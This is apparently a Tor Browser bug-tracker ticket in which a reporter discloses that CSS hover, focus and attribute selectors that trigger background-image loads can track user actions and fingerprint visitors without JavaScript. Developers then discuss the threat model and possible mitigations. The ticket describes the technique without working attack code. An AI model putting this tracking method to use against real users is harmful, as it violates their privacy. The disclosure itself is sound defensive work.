Opened 4 months ago

Last modified 3 months ago

#30392 new defect

CSS features allow real-time tracking

Reported by: davywtf Owned by: tbb-team
Priority: Medium Milestone:
Component: Applications/Tor Browser Version:
Severity: Normal Keywords:
Cc: ehsan.akhgari@… Actual Points:
Parent ID: Points:
Reviewer: Sponsor:

Description

CSS features like :hover, :focus, and [value] queries in combination with background image changes allow for the collection of nearly every action a visitor makes on a web page in real-time without JavaScript. Aside from the obvious creep factor this could be used to fingerprint visitors. The attack can be implemented in third party CSS (CSS-XSS).

Proof of Concept: https://twitter.com/davywtf/status/1124146339259002881
Code for proof: https://gist.github.com/wybiral/c8f46fdf1fc558d631b55de3a0267771

Beyond simply fingerprinting based on browsing behavior an attacker could also determine the referring page based on the mouse position at page load.

Solutions to fix the problem would break some aesthetic functionality (i.e. no more :hover image changes) but at that cost it would be trivial to prevent.

Ideally we could eliminate all types of asset requests (e.g. image changes) in all types of pseudo-class selectors or prefetch all asset requests on page load. But that proposal sounds bigger than Tor Browser.

Child Tickets

Change History (5)

comment:1 Changed 4 months ago by Crissy2

By default if "display:none" on a descendant element and:

`affectedElement>div
{

display:none;
background:...;

}

affectedElement:hover>div, affectedElement:focus>div
{

display:block;

}`

and you hover it, the background will be loaded at hovering... but. It is used in all popup menus.

So it is not trivial to prevent it.

To prevent it, there should be a button to clear all cookies / data associated with current website, that closes website and then clear cookies. Still not working in TBB :/

Last edited 4 months ago by Crissy2 (previous) (diff)

comment:2 Changed 4 months ago by gk

Keywords: css removed
Status: newneeds_information
Version: Tor: unspecified

So, what exactly is the threat here? We don't spoof referers unless you come from a .onion domain and go to a non .onion one. And I am not sure I understand the fingerprinting concern. You mean the website you are interacting with is recognizing you once you come back? If so, how so if _only_ CSS is available (moreover, tracking by first-party domain is currently out of scope; if that's done by identifiers like cookies then New Identity is your friend given that not only cookies but numerous state has to get cleared to separate those visits).

comment:3 Changed 4 months ago by gk

Cc: ehsan.akhgari@… added

#30347 is a duplicate. (See comment:2 where I still trying to figure out what exactly the tracking vector is

comment:4 Changed 3 months ago by davywtf

Tracking in the sense that it can be used to fingerprint users based on behavior that's hard for the user to hide. And the user may be completely unaware that it's happening since they typically don't assume metrics are being collected on static pages with NoScript.

To give you some ideas:

  • Based on motion you can determine mouse vs touchpad vs keyboard navigation
  • If research into gait analysis translates you should be able to predict biometrics (arm dimensions) from mouse movement
  • Reveals screen visibility (scroll location, window dimensions, etc)

So it's not a major threat in the sense that it's directly identifying a user or their machine (unless those metrics are already known) but it's a potential fingerprinting data point that could be mitigated entirely by preloading content linked from CSS. And the future of online tracking and privacy violation will almost certainly involve basic machine learning approaches applied to seemingly innocuous user input like this.

comment:5 Changed 3 months ago by gk

Status: needs_informationnew
Note: See TracTickets for help on using tickets.